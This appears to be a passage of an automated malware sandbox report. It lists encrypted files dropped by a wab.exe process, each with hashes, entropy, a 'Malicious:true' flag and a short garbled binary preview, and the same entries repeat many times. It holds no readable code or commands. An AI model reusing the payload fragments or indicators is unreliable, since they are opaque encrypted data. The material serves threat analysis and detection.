                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOhfV7jDny5fzVCUKIhPLFNudhCu4Q3zVlCJm:ZIc0afzkI9WaXNhFj255YcLqdhN735am
                                                                                MD5:3592E4D62BF9B5719D72568AA3C397DD
                                                                                SHA1:20FA7919C46CA2901DD856927BE9171CDAA60264
                                                                                SHA-256:3007C75E8539EF96458FA012F1E855FBAF48D8D51226D34F32A14723FA23CAFC
                                                                                SHA-512:40D04D66337D447377AE01675A62DAE0CA400C5B0F44B601B0CAF511B50D5F6785F531A79A691437F23C53677C17F9ACE1921969FEF435979C4E7222A30FF086
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):169555
                                                                                Entropy (8bit):7.998856953208157
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOhfV7jDny5fzVCUKIhPLFNudhCu4Q3zVlCJm:ZIc0afzkI9WaXNhFj255YcLqdhN735am
                                                                                MD5:3592E4D62BF9B5719D72568AA3C397DD
                                                                                SHA1:20FA7919C46CA2901DD856927BE9171CDAA60264
                                                                                SHA-256:3007C75E8539EF96458FA012F1E855FBAF48D8D51226D34F32A14723FA23CAFC
                                                                                SHA-512:40D04D66337D447377AE01675A62DAE0CA400C5B0F44B601B0CAF511B50D5F6785F531A79A691437F23C53677C17F9ACE1921969FEF435979C4E7222A30FF086
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):169555
                                                                                Entropy (8bit):7.998856953208157
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOhfV7jDny5fzVCUKIhPLFNudhCu4Q3zVlCJm:ZIc0afzkI9WaXNhFj255YcLqdhN735am
                                                                                MD5:3592E4D62BF9B5719D72568AA3C397DD
                                                                                SHA1:20FA7919C46CA2901DD856927BE9171CDAA60264
                                                                                SHA-256:3007C75E8539EF96458FA012F1E855FBAF48D8D51226D34F32A14723FA23CAFC
                                                                                SHA-512:40D04D66337D447377AE01675A62DAE0CA400C5B0F44B601B0CAF511B50D5F6785F531A79A691437F23C53677C17F9ACE1921969FEF435979C4E7222A30FF086
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):169555
                                                                                Entropy (8bit):7.998856953208157
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOhfV7jDny5fzVCUKIhPLFNudhCu4Q3zVlCJm:ZIc0afzkI9WaXNhFj255YcLqdhN735am
                                                                                MD5:3592E4D62BF9B5719D72568AA3C397DD
                                                                                SHA1:20FA7919C46CA2901DD856927BE9171CDAA60264
                                                                                SHA-256:3007C75E8539EF96458FA012F1E855FBAF48D8D51226D34F32A14723FA23CAFC
                                                                                SHA-512:40D04D66337D447377AE01675A62DAE0CA400C5B0F44B601B0CAF511B50D5F6785F531A79A691437F23C53677C17F9ACE1921969FEF435979C4E7222A30FF086
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):173751
                                                                                Entropy (8bit):7.998803351392316
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOhfV7jDny5fzVCUKIhPLFNudhCuBercfMUMvEa:ZIc0afzkI9WaXNhFj255YcLqdhNBkcfY
                                                                                MD5:28839D574AB1504C693411F9FE20D6FA
                                                                                SHA1:F6E0D0650F9063B27A126F6739F188AF3DBD8851
                                                                                SHA-256:DFA56D3ED2A01AAC1197123BD1A68BAE8E1CCFAE90A8020CC40C0178A198C872
                                                                                SHA-512:197E05BD53313DFB75958FE6FC5010CE74406BCB816D04F1F156C553AB6B4A76D3954F1AAB1C739F076F7E333CA654DDEB628824BD0E3A734B32D41F9DF6CF55
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):173751
                                                                                Entropy (8bit):7.998803351392316
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOhfV7jDny5fzVCUKIhPLFNudhCuBercfMUMvEa:ZIc0afzkI9WaXNhFj255YcLqdhNBkcfY
                                                                                MD5:28839D574AB1504C693411F9FE20D6FA
                                                                                SHA1:F6E0D0650F9063B27A126F6739F188AF3DBD8851
                                                                                SHA-256:DFA56D3ED2A01AAC1197123BD1A68BAE8E1CCFAE90A8020CC40C0178A198C872
                                                                                SHA-512:197E05BD53313DFB75958FE6FC5010CE74406BCB816D04F1F156C553AB6B4A76D3954F1AAB1C739F076F7E333CA654DDEB628824BD0E3A734B32D41F9DF6CF55
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):173751
                                                                                Entropy (8bit):7.998803351392316
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOhfV7jDny5fzVCUKIhPLFNudhCuBercfMUMvEa:ZIc0afzkI9WaXNhFj255YcLqdhNBkcfY
                                                                                MD5:28839D574AB1504C693411F9FE20D6FA
                                                                                SHA1:F6E0D0650F9063B27A126F6739F188AF3DBD8851
                                                                                SHA-256:DFA56D3ED2A01AAC1197123BD1A68BAE8E1CCFAE90A8020CC40C0178A198C872
                                                                                SHA-512:197E05BD53313DFB75958FE6FC5010CE74406BCB816D04F1F156C553AB6B4A76D3954F1AAB1C739F076F7E333CA654DDEB628824BD0E3A734B32D41F9DF6CF55
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):173751
                                                                                Entropy (8bit):7.998803351392316
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOhfV7jDny5fzVCUKIhPLFNudhCuBercfMUMvEa:ZIc0afzkI9WaXNhFj255YcLqdhNBkcfY
                                                                                MD5:28839D574AB1504C693411F9FE20D6FA
                                                                                SHA1:F6E0D0650F9063B27A126F6739F188AF3DBD8851
                                                                                SHA-256:DFA56D3ED2A01AAC1197123BD1A68BAE8E1CCFAE90A8020CC40C0178A198C872
                                                                                SHA-512:197E05BD53313DFB75958FE6FC5010CE74406BCB816D04F1F156C553AB6B4A76D3954F1AAB1C739F076F7E333CA654DDEB628824BD0E3A734B32D41F9DF6CF55
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):173751
                                                                                Entropy (8bit):7.998803351392316
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOhfV7jDny5fzVCUKIhPLFNudhCuBercfMUMvEa:ZIc0afzkI9WaXNhFj255YcLqdhNBkcfY
                                                                                MD5:28839D574AB1504C693411F9FE20D6FA
                                                                                SHA1:F6E0D0650F9063B27A126F6739F188AF3DBD8851
                                                                                SHA-256:DFA56D3ED2A01AAC1197123BD1A68BAE8E1CCFAE90A8020CC40C0178A198C872
                                                                                SHA-512:197E05BD53313DFB75958FE6FC5010CE74406BCB816D04F1F156C553AB6B4A76D3954F1AAB1C739F076F7E333CA654DDEB628824BD0E3A734B32D41F9DF6CF55
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):173751
                                                                                Entropy (8bit):7.998803351392316
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOhfV7jDny5fzVCUKIhPLFNudhCuBercfMUMvEa:ZIc0afzkI9WaXNhFj255YcLqdhNBkcfY
                                                                                MD5:28839D574AB1504C693411F9FE20D6FA
                                                                                SHA1:F6E0D0650F9063B27A126F6739F188AF3DBD8851
                                                                                SHA-256:DFA56D3ED2A01AAC1197123BD1A68BAE8E1CCFAE90A8020CC40C0178A198C872
                                                                                SHA-512:197E05BD53313DFB75958FE6FC5010CE74406BCB816D04F1F156C553AB6B4A76D3954F1AAB1C739F076F7E333CA654DDEB628824BD0E3A734B32D41F9DF6CF55
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):173751
                                                                                Entropy (8bit):7.998803351392316
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOhfV7jDny5fzVCUKIhPLFNudhCuBercfMUMvEa:ZIc0afzkI9WaXNhFj255YcLqdhNBkcfY
                                                                                MD5:28839D574AB1504C693411F9FE20D6FA
                                                                                SHA1:F6E0D0650F9063B27A126F6739F188AF3DBD8851
                                                                                SHA-256:DFA56D3ED2A01AAC1197123BD1A68BAE8E1CCFAE90A8020CC40C0178A198C872
                                                                                SHA-512:197E05BD53313DFB75958FE6FC5010CE74406BCB816D04F1F156C553AB6B4A76D3954F1AAB1C739F076F7E333CA654DDEB628824BD0E3A734B32D41F9DF6CF55
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):173751
                                                                                Entropy (8bit):7.998803351392316
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOhfV7jDny5fzVCUKIhPLFNudhCuBercfMUMvEa:ZIc0afzkI9WaXNhFj255YcLqdhNBkcfY
                                                                                MD5:28839D574AB1504C693411F9FE20D6FA
                                                                                SHA1:F6E0D0650F9063B27A126F6739F188AF3DBD8851
                                                                                SHA-256:DFA56D3ED2A01AAC1197123BD1A68BAE8E1CCFAE90A8020CC40C0178A198C872
                                                                                SHA-512:197E05BD53313DFB75958FE6FC5010CE74406BCB816D04F1F156C553AB6B4A76D3954F1AAB1C739F076F7E333CA654DDEB628824BD0E3A734B32D41F9DF6CF55
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):173751
                                                                                Entropy (8bit):7.998803351392316
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOhfV7jDny5fzVCUKIhPLFNudhCuBercfMUMvEa:ZIc0afzkI9WaXNhFj255YcLqdhNBkcfY
                                                                                MD5:28839D574AB1504C693411F9FE20D6FA
                                                                                SHA1:F6E0D0650F9063B27A126F6739F188AF3DBD8851
                                                                                SHA-256:DFA56D3ED2A01AAC1197123BD1A68BAE8E1CCFAE90A8020CC40C0178A198C872
                                                                                SHA-512:197E05BD53313DFB75958FE6FC5010CE74406BCB816D04F1F156C553AB6B4A76D3954F1AAB1C739F076F7E333CA654DDEB628824BD0E3A734B32D41F9DF6CF55
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):173751
                                                                                Entropy (8bit):7.998803351392316
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOhfV7jDny5fzVCUKIhPLFNudhCuBercfMUMvEa:ZIc0afzkI9WaXNhFj255YcLqdhNBkcfY
                                                                                MD5:28839D574AB1504C693411F9FE20D6FA
                                                                                SHA1:F6E0D0650F9063B27A126F6739F188AF3DBD8851
                                                                                SHA-256:DFA56D3ED2A01AAC1197123BD1A68BAE8E1CCFAE90A8020CC40C0178A198C872
                                                                                SHA-512:197E05BD53313DFB75958FE6FC5010CE74406BCB816D04F1F156C553AB6B4A76D3954F1AAB1C739F076F7E333CA654DDEB628824BD0E3A734B32D41F9DF6CF55
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):173751
